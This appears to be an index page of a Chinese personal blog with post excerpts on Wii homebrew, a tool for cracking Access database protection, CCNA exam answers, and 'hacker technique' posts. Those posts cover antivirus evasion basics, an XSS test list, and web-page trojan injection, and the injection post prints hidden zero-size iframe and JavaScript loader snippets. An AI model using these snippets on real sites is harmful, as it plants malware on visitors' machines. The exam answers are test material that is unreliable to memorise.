Apr 27

WII 運行MHG經驗

日记               共有人观看过

看到出左MHG..唯有將封忍左半年的WII拿出來玩下..

日版機 3.1J版 WIIKEY 1.9B硬改..= ='' 一年前配置了..

首先.當然要安裝大熱的HBC.多功能WII軟件.內含 黑軟安裝.AVI RMVB播放.直讀遊戲.N64模擬器.
試了一下用來播放PSP格式高清MP4.不錯.很流暢.RMVB還沒試..
...

Apr 23

MS ACCESS SHIFT破解器 VBA

MS ACCESS               共有人观看过

用ACCESS写了这个小工具..方便破解加密了SHIFT 的MDB文件..呵...

200904232253114034.rar

Apr 22

CCNA 3 ESwitching Chapter 2 Q and A

CCNA               共有人观看过

1.What is a benefit of having an extranet?

It provides web-like access to company information for employees only.

It limits access to corporate information to secure VPN or remote access connections only.
...

Apr 22

CCNA 3 ESwitching Chapter 1 Q and A

CCNA               共有人观看过


1. Which layer of the hierarchical network design model is refered to as the high-speed backbone of the internetwork, where high availability and redundancy are critical?

...
Apr 22

CCNA 3 ESwitching Chapter 7 Q and A

CCNA               共有人观看过

1. Which installation method will allow connectivity for a new wireless network?

set up WEP on the access point only

set up open access on both the access point and each device connected to it

...
Apr 22

CCNA 3 ESwitching Chapter 5 Q and A

CCNA               共有人观看过

1. Which two statements are true about the default operation of STP in a Layer 2 switched environment that has redundant connections between switches? (Choose two.)• The root switch is the switch

Apr 22

CCNA 3 ESwitching Chapter 6 Q and A

CCNA               共有人观看过

1


Refer to the exhibit. Switch1 is correctly configured for the VLANs that are displayed in the graphic. The configuration that is shown was applied to RTA to allow for interVLAN connectivity between hosts attached to Switch1. After testing the network, the administrator logged the following report:
...

Apr 22

汇编免杀基础知识——-扫盲

黑客技术               共有人观看过
汇编免杀基础知识——-扫盲

一.机械码,又称机器码.
ultraedit打开,编辑exe文件时你会看到
许许多多的由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成的数码,这些数码
就是机器码.
修改程序时必须通过修改机器码来修改exe文件.

二.需要熟练掌握的全部汇编知识(只有这么多)
...
Apr 20

XSS攻击测试语句大全

黑客技术               共有人观看过

跨站脚本=XSS攻击测试语句大全

url: %3C=<   %3E=>   %22="   %2e=.   (=%28   '=%27    )=%29   /=%2F   ;=%3B
...

Apr 17

挂马方式和系统判断等代码

黑客技术               共有人观看过

一:框架挂马
<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
...